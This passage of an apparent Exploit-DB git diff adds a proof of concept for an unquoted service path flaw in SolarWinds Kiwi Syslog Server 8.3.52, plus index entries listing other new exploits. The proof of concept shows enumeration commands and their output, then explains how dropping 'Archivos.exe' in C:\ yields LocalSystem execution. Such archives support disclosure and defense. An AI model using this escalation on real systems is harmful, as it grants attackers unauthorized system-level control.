https://www.kiwisyslog.com/ +# Software Link: https://www.kiwisyslog.com/downloads +# Version: 8.3.52 +# Tested on: Windows XP Professional Service Pack 3 + +# Description: +# SolarWinds Kiwi Syslog Server 8.3.52 is an affordable software to manage syslog messages, SNMP traps, and Windows event logs + +# PoC: + +# C:\>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """ + +Kiwi Syslog Server Kiwi Syslog Server C:\Archivos de programa\Syslogd\Syslogd_Service.exe Auto + +# C:\>sc qc "Kiwi Syslog Server" +[SC] GetServiceConfig SUCCESS + +SERVICE_NAME: Kiwi Syslog Server + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Archivos de programa\Syslogd\Syslogd_Service.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Kiwi Syslog Server + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + + +# Exploit +Using the BINARY_PATH_NAME listed above, an executable named "Archivos.exe" +could be placed in "C:\", and it would be executed as the Local System user +next time the service was restarted. \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index cddf53576..4e5efedf3 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10755,6 +10755,8 @@ id,file,description,date,author,type,platform,port 47593,exploits/windows/local/47593.txt,"Wacom WTabletService 6.6.7-3 - 'WTabletServicePro' Unquoted Service Path",2019-11-06,"Marcos Antonio León",local,windows, 47594,exploits/windows/local/47594.txt,"QNAP NetBak Replicator 4.5.6.0607 - 'QVssService' Unquoted Service Path",2019-11-06,"Ivan Marmolejo",local,windows, 47597,exploits/windows/local/47597.txt,"Adaware Web Companion version 4.8.2078.3950 - 'WCAssistantService' Unquoted Service Path",2019-11-07,"Mariela L Martínez Hdez",local,windows, +47599,exploits/windows/local/47599.txt,"SolarWinds Kiwi Syslog Server 8.3.52 - 'Kiwi Syslog Server' Unquoted Service Path",2019-11-08,"Carlos A Garcia R",local,windows, +47601,exploits/android/local/47601.rb,"Android Janus - APK Signature Bypass (Metasploit)",2019-11-08,Metasploit,local,android, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -17763,6 +17765,7 @@ id,file,description,date,author,type,platform,port 47566,exploits/hardware/remote/47566.cpp,"MikroTik RouterOS 6.45.6 - DNS Cache Poisoning",2019-10-31,"Jacob Baines",remote,hardware, 47573,exploits/multiple/remote/47573.rb,"Nostromo - Directory Traversal Remote Command Execution (Metasploit)",2019-11-01,Metasploit,remote,multiple, 47576,exploits/windows/remote/47576.py,"Ayukov NFTP client 1.71 - 'SYST' Buffer Overflow",2019-11-04,SYANiDE,remote,windows, +47602,exploits/linux/remote/47602.rb,"rConfig - install Command Execution (Metasploit)",2019-11-08,Metasploit,remote,linux, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -41914,3 +41917,6 @@ id,file,description,date,author,type,platform,port 47589,exploits/aspx/webapps/47589.txt,"SD.NET RIM 4.7.3c - 'idtyp' SQL Injection",2019-11-05,"Fabian Mosch_ Nick Theisinger",webapps,aspx,80 47595,exploits/hardware/webapps/47595.txt,"Smartwares HOME easy 1.0.9 - Client-Side Authentication Bypass",2019-11-06,LiquidWorm,webapps,hardware, 47596,exploits/hardware/webapps/47596.sh,"Smartwares HOME easy 1.0.9 - Database Backup Information Disclosure",2019-11-06,LiquidWorm,webapps,hardware, +47598,exploits/java/webapps/47598.py,"Jenkins build-metrics plugin 1.3 - 'label' Cross-Site Scripting",2019-11-08,vesche,webapps,java, +47600,exploits/php/webapps/47600.py,"Adive Framework 2.0.7 - Privilege Escalation",2019-11-08,"Pablo Santiago",webapps,php, +47603,exploits/php/webapps/47603.txt,"Nextcloud 17 - Cross-Site Request Forgery",2019-11-08,"Ozer Goker",webapps,php,